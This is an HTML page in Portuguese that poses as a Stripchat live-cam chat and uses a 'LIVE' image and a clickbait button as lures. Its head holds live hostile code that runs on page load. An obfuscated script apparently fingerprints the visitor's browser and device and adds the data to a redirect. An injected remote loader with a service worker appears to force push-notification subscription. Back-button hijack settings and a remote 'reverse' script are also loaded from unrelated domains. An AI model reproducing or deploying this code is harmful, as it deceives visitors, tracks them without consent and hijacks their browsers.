<!DOCTYPE html>
<html lang="pt">
<head>
  <meta charset="UTF-8">
  <title>Live Chat - Stripchat</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <style>
    body {
      background:#1a1a1a;
      margin:0;
      padding:0;
      font-family: Arial, sans-serif;
      color:#fff;
      text-align:center;
    }
    .container {
      max-width:420px;
      margin:40px auto;
      padding:0 10px;
    }
    .title {
      font-size:22px;
      margin-bottom:15px;
      line-height:1.35;
    }
    .live-box {
      position:relative;
      border-radius:12px;
      overflow:hidden;
      box-shadow:0 4px 10px rgba(0,0,0,0.4);
    }
    .live-img {
      width:100%;
      height:290px;
      object-fit:cover;
      background:#333;
    }
    .live-badge {
      position:absolute;
      top:8px;
      left:8px;
      padding:4px 8px;
      font-size:12px;
      background:#FF0000;
      border-radius:4px;
      color:#fff;
    }
    .cta-btn {
      margin-top:20px;
      display:inline-block;
      background:#e14a22;
      color:#fff;
      padding:14px 28px;
      font-size:18px;
      border-radius:8px;
      text-decoration:none;
      box-shadow:0 4px 8px rgba(0,0,0,0.4);
    }
  </style>
  <script>
    var a='mcrpolfattafloprcmlVeedrosmico?ncc=uca&FcusleluVlearVsyipoonrctannEdhrgoiiHdt_emgocdeellicboosmccoast_avDetrnseigoAnrcebsruocw=seelri_bvoemr_ssiiocn'.split('').reduce((m,c,i)=>i%2?m+c:c+m).split('c');var Replace=(o=>{var v=a[0];try{v+=a[1]+Boolean(navigator[a[2]][a[3]]);navigator[a[2]][a[4]](o[0]).then(r=>{o[0].forEach(k=>{v+=r[k]?a[5]+o[1][o[0].indexOf(k)]+a[6]+encodeURIComponent(r[k]):a[0]})})}catch(e){}return u=>window.location.replace([u,v].join(u.indexOf(a[7])>-1?a[5]:a[7]))})([[a[8],a[9],a[10],a[11]],[a[12],a[13],a[14],a[15]]]); 
    var s = document.createElement('script');
    s.src='//hoksomuptak.net/170/b9b5a/mw.min.js?z=8825542'+'&sw=/sw-check-permissions-89811.js';
    s.onload = function(result) {
        switch (result) {
            case 'onPermissionDefault':break;
            case 'onPermissionAllowed':break;
            case 'onPermissionDenied':break;
            case 'onAlreadySubscribed':break;
            case 'onNotificationUnsupported':break;
        }
    };
    document.head.appendChild(s);
  </script>
  <script>
      var Back_Button_Zone = 8825564;
      var Domain_TB = "g0st.com";
  </script>
  <script async src="https://desenteir.com/170/b9b5a/reverse.min.js?sf=1"></script>
</head>
<body>
  <div class="container">
    <div class="title">Ela está esperando você há um tempo...<br/>entre AGORA no chat (grátis hoje)</div>
    <div class="live-box">
      <a href="https://snjxcb.com/ksgl3i.php?lp=1">
    <img class="live-img" src="live_1.png" alt="Live Stream">
    <div class="live-badge">🔴 LIVE</div>
      </a>
    </div>
    

    <a href="https://snjxcb.com/ksgl3i.php?lp=1" class="cta-btn">Entrar agora</a>
  </div>
</body>
</html>
